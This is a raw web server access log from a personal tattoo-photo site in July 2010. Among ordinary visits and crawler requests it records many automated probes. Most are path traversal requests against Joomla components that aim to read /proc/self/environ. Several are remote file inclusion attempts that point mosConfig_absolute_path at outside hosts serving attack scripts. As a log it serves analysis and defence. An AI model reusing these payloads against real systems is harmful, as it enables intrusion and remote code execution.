76.112.8.70 - - [09/Jul/2010:00:41:19 -0500] "GET /logs/access_log.1216598400 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216598400""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
190.6.198.47 - - [09/Jul/2010:00:41:23 -0500] "GET /logs/access_log.1216598400 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1216598400""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
190.6.198.47 - - [09/Jul/2010:00:41:32 -0500] "GET / HTTP/1.0" 200 991 "http://tomdolan.pconline.com/""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)"
87.250.255.243 - - [09/Jul/2010:00:48:09 -0500] "GET /logs/access_log.1276905600 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
187.45.193.143 - - [09/Jul/2010:01:02:49 -0500] "GET /logs/access_log.1276732800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
187.45.193.143 - - [09/Jul/2010:01:02:50 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
187.45.193.143 - - [09/Jul/2010:01:02:50 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
187.45.193.143 - - [09/Jul/2010:01:02:58 -0500] "GET /logs/access_log.1276819200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
72.249.119.49 - - [09/Jul/2010:01:05:45 -0500] "GET //components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/kill9/id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
72.249.119.49 - - [09/Jul/2010:01:05:45 -0500] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/kill9/id1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
72.249.119.49 - - [09/Jul/2010:01:05:45 -0500] "GET /logs/access_log.1277424000//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/kill9/id1.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
216.245.214.42 - - [09/Jul/2010:01:05:53 -0500] "GET /logs/access_log.1277424000//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://helhetreklam.se/id?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
216.245.214.42 - - [09/Jul/2010:01:05:53 -0500] "GET //components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://helhetreklam.se/id?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.245.214.42 - - [09/Jul/2010:01:05:53 -0500] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://helhetreklam.se/id?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
216.245.214.42 - - [09/Jul/2010:01:06:11 -0500] "GET /logs/access_log.1277424000//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://helhetreklam.se/id?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
216.245.214.42 - - [09/Jul/2010:01:06:11 -0500] "GET //components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://helhetreklam.se/id?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.245.214.42 - - [09/Jul/2010:01:06:11 -0500] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://helhetreklam.se/id?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
218.38.34.19 - - [09/Jul/2010:01:13:00 -0500] "GET //components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 321 "-""plaNETWORK Bot Search"
218.38.34.19 - - [09/Jul/2010:01:13:00 -0500] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 326 "-""plaNETWORK Bot Search"
218.38.34.19 - - [09/Jul/2010:01:13:00 -0500] "GET /logs/access_log.1277424000//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 348 "-""plaNETWORK Bot Search"
218.38.34.19 - - [09/Jul/2010:01:13:00 -0500] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 326 "-""plaNETWORK Bot Search"
218.38.34.19 - - [09/Jul/2010:01:13:00 -0500] "GET /logs/access_log.1277424000//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 348 "-""plaNETWORK Bot Search"
218.38.34.19 - - [09/Jul/2010:01:13:00 -0500] "GET //components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 321 "-""plaNETWORK Bot Search"
71.136.12.74 - - [09/Jul/2010:01:23:00 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AskTB5.6)"
71.136.12.74 - - [09/Jul/2010:01:23:00 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://tattoos.lovetoknow.com/Art_Designs""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AskTB5.6)"
71.136.12.74 - - [09/Jul/2010:01:23:00 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AskTB5.6)"
71.136.12.74 - - [09/Jul/2010:01:23:08 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AskTB5.6)"
71.136.12.74 - - [09/Jul/2010:01:23:09 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AskTB5.6)"
71.136.12.74 - - [09/Jul/2010:01:23:09 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AskTB5.6)"
71.136.12.74 - - [09/Jul/2010:01:23:09 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AskTB5.6)"
71.136.12.74 - - [09/Jul/2010:01:23:09 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AskTB5.6)"
71.136.12.74 - - [09/Jul/2010:01:23:09 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AskTB5.6)"
71.136.12.74 - - [09/Jul/2010:01:23:09 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AskTB5.6)"
71.136.12.74 - - [09/Jul/2010:01:23:09 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AskTB5.6)"
71.136.12.74 - - [09/Jul/2010:01:23:09 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AskTB5.6)"
71.136.12.74 - - [09/Jul/2010:01:23:09 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AskTB5.6)"
71.136.12.74 - - [09/Jul/2010:01:23:09 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AskTB5.6)"
71.136.12.74 - - [09/Jul/2010:01:23:19 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AskTB5.6)"
71.136.12.74 - - [09/Jul/2010:01:23:19 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AskTB5.6)"
71.136.12.74 - - [09/Jul/2010:01:23:19 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AskTB5.6)"
71.136.12.74 - - [09/Jul/2010:01:23:19 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AskTB5.6)"
71.136.12.74 - - [09/Jul/2010:01:23:19 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AskTB5.6)"
71.136.12.74 - - [09/Jul/2010:01:23:19 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AskTB5.6)"
71.136.12.74 - - [09/Jul/2010:01:23:19 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AskTB5.6)"
71.136.12.74 - - [09/Jul/2010:01:23:19 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AskTB5.6)"
71.136.12.74 - - [09/Jul/2010:01:23:20 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AskTB5.6)"
71.136.12.74 - - [09/Jul/2010:01:23:20 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AskTB5.6)"
71.136.12.74 - - [09/Jul/2010:01:23:20 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AskTB5.6)"
87.229.26.132 - - [09/Jul/2010:01:23:48 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:24:03 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:24:03 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:24:43 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:25:12 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.233.70.44 - - [09/Jul/2010:01:25:31 -0500] "GET /logs/access_log.1275609600//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.833"
87.233.70.44 - - [09/Jul/2010:01:25:31 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
87.233.70.44 - - [09/Jul/2010:01:25:31 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.833"
87.233.70.44 - - [09/Jul/2010:01:25:32 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
87.233.70.44 - - [09/Jul/2010:01:25:40 -0500] "GET /logs/access_log.1276732800//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.833"
87.233.70.44 - - [09/Jul/2010:01:25:52 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
87.229.26.132 - - [09/Jul/2010:01:25:52 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:25:52 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.233.70.44 - - [09/Jul/2010:01:26:16 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
87.233.70.44 - - [09/Jul/2010:01:26:18 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
87.233.70.44 - - [09/Jul/2010:01:26:40 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
87.233.70.44 - - [09/Jul/2010:01:27:26 -0500] "GET /logs/access_log.1275609600//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.833"
87.233.70.44 - - [09/Jul/2010:01:27:26 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
87.233.70.44 - - [09/Jul/2010:01:27:26 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.833"
87.250.255.243 - - [09/Jul/2010:01:27:29 -0500] "GET /logs/access_log.1277856000 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
87.233.70.44 - - [09/Jul/2010:01:27:29 -0500] "GET /logs/access_log.1275696000//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.833"
87.233.70.44 - - [09/Jul/2010:01:27:36 -0500] "GET /logs/access_log.1275609600//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.833"
87.233.70.44 - - [09/Jul/2010:01:27:36 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
87.233.70.44 - - [09/Jul/2010:01:27:37 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.833"
87.233.70.44 - - [09/Jul/2010:01:27:39 -0500] "GET /logs/access_log.1275696000//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.833"
87.233.70.44 - - [09/Jul/2010:01:27:40 -0500] "GET /logs/access_log.1275609600//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.833"
87.233.70.44 - - [09/Jul/2010:01:27:40 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
87.233.70.44 - - [09/Jul/2010:01:27:41 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.833"
87.233.70.44 - - [09/Jul/2010:01:27:48 -0500] "GET /logs/access_log.1276646400//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.833"
87.233.70.44 - - [09/Jul/2010:01:28:57 -0500] "GET /logs/access_log.1275609600//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.833"
87.233.70.44 - - [09/Jul/2010:01:28:58 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
87.233.70.44 - - [09/Jul/2010:01:28:58 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.833"
87.233.70.44 - - [09/Jul/2010:01:29:09 -0500] "GET /logs/access_log.1276646400//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.833"
87.229.26.132 - - [09/Jul/2010:01:35:07 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:35:29 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:36:28 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:37:06 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
72.55.156.70 - - [09/Jul/2010:01:37:30 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
87.229.26.132 - - [09/Jul/2010:01:37:41 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:37:44 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:37:46 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:37:46 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:37:48 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
207.46.13.51 - - [09/Jul/2010:01:38:04 -0500] "GET /logs/access_log.1264204800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.229.26.132 - - [09/Jul/2010:01:38:28 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:38:30 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:39:05 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:39:23 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
91.184.2.198 - - [09/Jul/2010:01:39:43 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
67.195.112.232 - - [09/Jul/2010:01:40:08 -0500] "GET /logs/access_log.1207180800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.232 - - [09/Jul/2010:01:40:35 -0500] "GET /logs/access_log.1262390400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.229.26.132 - - [09/Jul/2010:01:41:11 -0500] "GET /logs/access_log.1275782400//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:41:11 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:41:12 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:41:14 -0500] "GET /logs/access_log.1276732800//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:41:15 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:41:15 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:41:17 -0500] "GET /logs/access_log.1276041600//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:41:18 -0500] "GET /logs/access_log.1274572800//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:41:19 -0500] "GET /logs/access_log.1275782400//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:41:19 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:41:19 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:41:24 -0500] "GET /logs/access_log.1276041600//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
91.184.2.198 - - [09/Jul/2010:01:42:00 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
87.229.26.132 - - [09/Jul/2010:01:42:40 -0500] "GET /logs/access_log.1275782400//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:42:40 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:42:41 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:42:41 -0500] "GET /logs/access_log.1275782400//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:42:41 -0500] "GET /logs/access_log.1275609600//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:42:41 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:42:41 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:42:42 -0500] "GET /logs/access_log.1275609600//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:43:34 -0500] "GET /logs/access_log.1275782400//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:43:34 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:43:34 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
87.229.26.132 - - [09/Jul/2010:01:43:50 -0500] "GET /logs/access_log.1276819200//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
